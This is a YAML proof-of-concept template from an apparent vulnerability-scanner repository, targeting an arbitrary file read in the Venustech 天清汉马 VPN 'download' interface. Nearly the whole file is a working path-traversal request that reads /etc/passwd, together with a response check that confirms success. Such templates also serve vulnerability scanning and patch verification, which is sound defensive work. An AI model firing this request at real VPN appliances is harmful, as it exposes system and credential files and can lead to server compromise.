Poc_Scanner/poc/SE-Poc/V5VPN-download-ReadFile.yaml
2024-10-09 15:15:50 +08:00

32 lines
788 B
YAML
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

keyword: 天清汉马VPN
name: 天清汉马VPN接口download任意文件读取
description: |
启明星辰天清汉马VPN系统download接口处存在任意文件读取漏洞获取服务器的敏感数据和配置信息造成系统的不安全性从而控制服务器
requests: # 为空代表默认或者不启用
path: "/vpn/user/download/client?ostype=../../../../../../../etc/passwd"
method: GET
headers:
User-agent:
Content-length:
Accept:
Content-type:
Accept-Encoding:
Cookie:
Referer:
X-Forwarded-For:
body-raw: |-
response:
path: ""
status-code: 200
body: "root"
headers:
Server:
Content-type:
Content-length:
Date:
Connection:
impact: |
数据库等高敏感度文件泄露。